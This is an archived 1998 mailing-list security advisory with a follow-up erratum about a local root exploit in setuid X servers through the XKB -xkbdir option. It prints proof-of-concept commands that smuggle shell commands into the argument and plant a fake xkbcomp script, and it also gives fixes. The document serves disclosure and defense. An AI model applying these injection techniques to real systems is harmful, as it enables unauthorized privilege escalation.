[591] in Best-of-Security
BoS: serious security problem in XKB
daemon@ATHENA.MIT.EDU (Pavel Kankovsky)
Sun Mar 8 12:01:08 1998
XDelivering-To: best-of-security@cyber.com.au
Delivering-To: best-of-security@cyber.com.au
Date: Tue, 3 Feb 1998 20:26:16 +0100
Reply-To: peak@kerberos.troja.mff.cuni.cz
From: Pavel Kankovsky <peak@kerberos.troja.mff.cuni.cz>
Old-X-Originally-To: To: BUGTRAQ@NETSPACE.ORG
Old-X-Originated-From: From: Pavel Kankovsky <peak@kerberos.troja.mff.cuni.cz>
Errors-To: best-of-security-request@cyber.com.au
To: best-of-security@cyber.com.au
Resent-From: best-of-security@cyber.com.au
The Neverending Story of X11 Insecurity continues...
Summary:
On a system where X11R6.3-based Xserver with XKEYBOARD extension (R6.1 is
probably affected too) is run in setuid or setgid enviroment (e.g. typical
XFree86 installation has XF86_* installed setuid root), local users can
exploit a "feature" of XKB implementation to execute arbitrary commands
with the extra privileges.
Quick vulnerability check:
$ Xserver -xkbdir 'id > /tmp/I_WAS_HERE;'
[exit X server]
$ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'
Quick fix:
1. as usual chmod u-s,g-s all installed Xserver binaries (*)
2. use xdm or a SAFE and PARANOID wrapper to start Xserver
(*) and unsafe or not-paranoid-enough setuid/setgid wrappers
(current Debian wrapper falls into this category)
Details:
In fact, there are (at least) two distict problems in XKB implementation,
both related to the use of -xkbdir option.
1. xkbcomp is invoked using system() or popen()
any shell metacharacters included in -xkbdir argument are interpreted
[demonstrated by the "quick vulnerability check"]
2. a user supplied instance of xkbcomp is invoked
-xkbdir argument is used to build the path to the compiler
$ cat > /tmp/xkbcomp
#!/bin/sh
id > /tmp/I_WAS_HERE
[ctrl+d]
$ chmod a+x /tmp/xkbcomp
$ Xserver -xkbdir /tmp
[X server executes /tmp/xkbcomp]
Further reading:
xc/programs/Xserver/xkb/xkbInit.c
xc/programs/Xserver/xkb/ddxLoad.c
xc/programs/Xserver/xkb/ddxList.c
--Pavel Kankovsky aka Peak [ Boycott Microsoft -- http://www.vcnet.com/bms ]
Date: Wed, 4 Feb 1998 10:39:28 +0100
Reply-To: peak@kerberos.troja.mff.cuni.cz
Sender: avalon
>From: Pavel Kankovsky <peak@kerberos.troja.mff.cuni.cz>
Subject: serious security problem in XKB--ERRATUM
X-To: linux-security@redhat.com
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.95.980203191041.17555H-100000@kerberos.troja.mff.cuni.cz>
Approved: darrenr@cyber.com.au
X-Originally-To: To: BUGTRAQ@NETSPACE.ORG
X-Originated-From: From: Pavel Kankovsky <peak@kerberos.troja.mff.cuni.cz>
> Quick vulnerability check:
>
> $ Xserver -xkbdir 'id > /tmp/I_WAS_HERE;'
> [exit X server]
> $ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'
This should read:
$ Xserver -xkbdir ':;id > /tmp/I_WAS_HERE;'
[exit X server]
$ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'
--Pavel Kankovsky aka Peak [ Boycott Microsoft -- http://www.vcnet.com/bms ]